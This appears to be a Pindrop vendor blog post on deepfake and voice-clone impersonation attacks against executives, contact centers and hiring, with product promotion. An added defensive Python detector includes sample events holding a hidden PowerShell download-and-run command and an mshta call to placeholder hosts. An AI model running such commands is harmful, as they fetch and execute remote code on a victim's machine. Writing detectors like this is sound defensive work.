AI-powered impersonation attacks use synthetic voice, deepfake video, and automation to convincingly mimic a real person, often an executive, a customer, or a job candidate, in real time to move money, steal credentials, or gain insider access.
AI-Powered Impersonation Attacks: Where They’re Succeeding and How to Defend Against Them
Adriana Gil Miner
CMO • June 17, 2026 (UPDATED ON June 17, 2026)
Key takeaways
- AI-driven attacks grew nearly 14x in six quarters (Q4 2024–Q1 2026, 700M+ calls)
- AI-enabled attacks are growing ~6x faster than traditional attacks
- Humans correctly identify AI-generated media only ~50% of the time; the human eye can no longer reliably make the call.
- Pindrop’s CISO Deepfake Defense Council mapped six recurring AI attacks; three are broken down here with real cases.
- The defense is continuous identity verification across voice, video, and digital: is this a machine, a bad actor, or the right human?
Not long ago, catching a deepfake job candidate was almost easy: ask them to wave a hand in front of their face, and the image would break. That trick is now gone.
When I sat down with the panel on our latest webinar, Pindrop’s Chief People Officer, Christine Aldrich, told us today’s fake candidates have polished resumes, credible LinkedIn profiles, and clean video and audio. The human eye can’t make the call anymore. That single shift is the thread running through everything our panel covered.
As one of our board advisors puts it, there are two kinds of companies right now: the ones that have been attacked, and the ones that have been attacked and don’t know it yet.
I pulled together this panel to walk through what these attacks look like in the wild, with the people who’ve caught them:
- Michael Barnhart, a 22-year intelligence veteran now at DTEX
- Amanda Landreth, VP, AI Strategist at Spokane Teachers Credit Union (STCU)
- Christine Aldrich, Pindrop’s Chief People Officer
What are the most common AI impersonation attacks on enterprises?
Pindrop’s CISO Deepfake Defense Council, security leaders from seven Fortune 500 enterprises and other category-leading organizations, mapped six recurring AI attacks across five anonymous risk-mapping exercises.
| AI attack | What it is | Where the risk concentrates |
|---|---|---|
| 1. Fake job candidates | Synthetic identities and real-time deepfakes used to pass interviews and land on payroll | Approaching catastrophic; any org hiring remote roles |
| 2. Contact center attacks | Impersonate a customer, pass authentication, take over the account | High risk for financial services |
| 3. Executive impersonation | Cloned voice or deepfake video of a leader used to force action | Severe in defense and IP-sensitive settings |
| 4. IT help desk attacks | Impersonate an employee to obtain an MFA reset or access | Severe because the help desk is an access-control path |
| 5. Wealth management scams | Fake advisor or client personas used to redirect funds | High financial risk: wealth, brokerage, crypto, VIP workflows |
| 6. Vendor / partner impersonation | Fake supplier emails, cloned voice messages, fake invoices | Strongest in fintech, crypto, and supply-chain contexts |
In Pindrop’s own data, AI-enabled fraud is growing approximately 6x faster than traditional fraud attacks. We broke down three of the six attacks live in our webinar.
How does executive impersonation actually work?
Short answer: Attackers clone a leader’s voice or face and use the authority of that identity to push an employee into a harmful action, usually a wire transfer or running a command.
Michael Barnhart shared a case that shows the pattern:
- A threat actor took over the real Telegram account of a crypto-company CEO, not a spoof.
- The target got a friendly message with a Calendly link to a video call.
- On the call, the entire leadership team, including the CEO, was deepfaked.
- “Hey, I can’t hear you. I can’t see you. Run this quick command to fix it.”
- The target pressed Windows+R, pasted the script, and the malware took over from there.
The deepfakes weren’t the goal; they were the setup to get the target comfortable enough to run a command. As Barnhart put it: “You can’t trust the audio, the visual. You have to be more proactive in looking for these things.”
According to the ESET Threat Report H1 2025, “ClickFix,” a social-engineering technique that tricks a target into running a malicious command themselves, usually behind a fake error or “fix this” prompt, rose 517% between H2 2024 and H1 2025.
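As an added example (not from the original article or from Pindrop), here is one way a defender could look for the Windows+R pattern described above in process-creation telemetry: a script host started directly by explorer.exe with download or concealment markers in its command line. The field names are modelled on Sysmon process-creation events; the events, host names, indicator list and `.invalid` URLs are constructed assumptions.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Assumed starter list of script hosts a pasted Run-dialog command may invoke.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}

# Command-line markers of download or concealment (assumed, not exhaustive).
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "encoded_command": re.compile(r"\s-(e|enc|encodedcommand)\s", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "download_and_run": re.compile(
        r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.I),
}

# Constructed sample events (hosts, paths and URLs are made up).
EVENTS = [
    {"Computer": "WS-014", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c iex(iwr https://fix.example.invalid/a.ps1)"},
    {"Computer": "WS-014", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
    {"Computer": "SRV-02", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File C:\\Ops\\patch.ps1 -Source https://wsus.example.invalid"},
    {"Computer": "WS-022", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://cdn.example.invalid/verify.hta # Verification ID 4471"},
]

def clickfix_hits(events):
    """Return (computer, image, indicators) for script hosts started by explorer.exe
    (the parent of Run-dialog launches) whose command line carries a marker."""
    hits = []
    for ev in events:
        parent = basename(ev["ParentImage"]).lower()
        image = basename(ev["Image"]).lower()
        if parent != "explorer.exe" or image not in SCRIPT_HOSTS:
            continue  # not launched from the user's shell, or not a script host
        found = sorted(n for n, rx in INDICATORS.items() if rx.search(ev["CommandLine"]))
        if found:  # a bare "cmd.exe" from the Run dialog is normal admin use
            hits.append((ev["Computer"], image, found))
    return hits

if __name__ == "__main__":
    for computer, image, found in clickfix_hits(EVENTS):
        print(f"{computer}: explorer.exe -> {image} [{', '.join(found)}]")
```

Because explorer.exe is also the parent of Start menu and shortcut launches, hits from a rule like this are triage leads to correlate with user reports, not verdicts.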
How do you catch a deepfake when the voice is real?
Short answer: Authentication alone can’t; you also need liveness detection.
Authentication asks, “Is this the right voice?”; liveness detection asks, “Is this a live human or a machine?” A genuine or cloned voice can pass the first and still fail the second.
A fraudster had spent roughly 3 hours on the phone with an STCU member, posing as the credit union’s own fraud department. Then that fraudster called into the contact center, impersonating the member.
The member’s real voice passed authentication, but the agent got a low-liveness-score alert. That mismatch was the signal, and the fraud team confirmed it wasn’t the member.
Authentication answered, “Is this the right voice?” and liveness detection answered, “Is this a live human or a machine?” Both layers had to fire.
Amanda said her agents “were blown away,” because they hadn’t seen this kind of catch before.
There was an operational win too. STCU’s old knowledge-based authentication took about 90 seconds per call before a member could even ask a question. For enrolled members now, identification takes under 15 seconds.
That gap is exactly where attackers operate: across Pindrop’s analysis, attackers bypass knowledge-based authentication in up to 90% of attempts and pass one-time-password checks nearly 1 in 4 times. A matching voice alone can’t clear a caller.
How do fake job candidates get through hiring?
Short answer: They don’t look fake anymore, so the human eye fails; continuous background identity verification catches what an interviewer can’t.
Today’s fake candidates show up with polished resumes, credible LinkedIn profiles, articulate answers, and clean video and audio; all that’s left is a faint pattern of tells, like a voice slightly out of sync or a subtle video glitch.
In Pindrop’s own pipeline, continuous identity verification flagged AI activity during an interview; the team traced the IP, and it came back to North Korea.
This isn’t a one-off. In Pindrop’s hiring telemetry, 1 in 343 applicants were linked to North Korea in 2025, rising to 1 in 47 in 2026, a 630% year-over-year increase.
Christine Aldrich’s advice for HR and recruiting leaders:
- Separate identity verification from the interview itself.
- Run it continuously through every stage of hiring, not as a one-time checkpoint.
- Audit how candidates apply, not just who applies.
She also pushed back on async, verify-after-the-fact tools. By the time someone’s an employee, the front door is already open. And background verification actually speeds hiring up, because what really slows it down is doubt.
When recruiters trust who they’re talking to, they can focus on the work: assessing skills and making great hires.
What do these three attacks have in common?
An executive on a video call, a member in the contact center, a candidate in an interview: three channels, but I kept coming back to the same set of questions. Is this a machine? Is this a bad actor? Is this the right human?
A one-time check can’t answer them; continuous identity verification can.
That’s the layer Pindrop® solutions were built for: authentication for the right human, liveness detection for the machine, and risk intelligence for the bad actor.
- Is this a machine? → Pindrop® Pulse for Meetings & Pindrop® Pulse for Contact Centers
- Is this a bad actor? → Pindrop® Protect
- Is this the right human? → Pindrop® Passport
Catch up on the full conversation on-demand.
AI-powered impersonation attacks FAQs
Six attacks kept coming up with Pindrop’s CISO Deepfake Defense Council: fake job applicants, contact center attacks, executive impersonation, IT help desk attacks, wealth management scams, and vendor or partner impersonation. AI-enabled attacks of this kind are growing approximately 6 times faster than traditional attacks across Pindrop’s customer base.
An attacker can present a genuine recording or a synthetic version of a legitimate voice that passes voice authentication, because authentication confirms whether the voice matches, not whether it is live. Liveness detection closes that gap by identifying whether the speaker is a live human or a machine. In one case shared on the webinar, a credit union caught a fraudster whose voice passed authentication but triggered a low liveness score.
Liveness detection is technology that identifies whether a speaker is a live human and not a machine, such as a recording or a synthetic voice. It runs alongside authentication so that a real or cloned voice alone is not enough to clear a check.
Today’s fake candidates have polished resumes, credible LinkedIn profiles, and high-quality video, so the human eye is no longer reliable. Separate identity verification from the interview, run it continuously through every stage of hiring rather than as a one-time checkpoint, and audit how candidates apply, not just who applies. Continuous identity verification can flag AI activity during a live interview, as it did in Pindrop’s own pipeline.
Yes. The endgame for nation-state operatives includes funding the regime and stealing intellectual property or personal data, which means mid-size organizations and credit unions are viable targets, not just large enterprises. In a coordinated action in June 2025, the U.S. Department of Justice announced it completed “searches of 29 known or suspected ‘laptop farms’ across 16 states, and the seizure of 29 financial accounts used to launder illicit funds and 21 fraudulent websites.”
Executive impersonation is a social engineering attack in which a fraudster impersonates a senior leader, often using a cloned or synthetic voice or a deepfake on video, to manipulate employees into transferring funds, sharing credentials, or taking other harmful actions.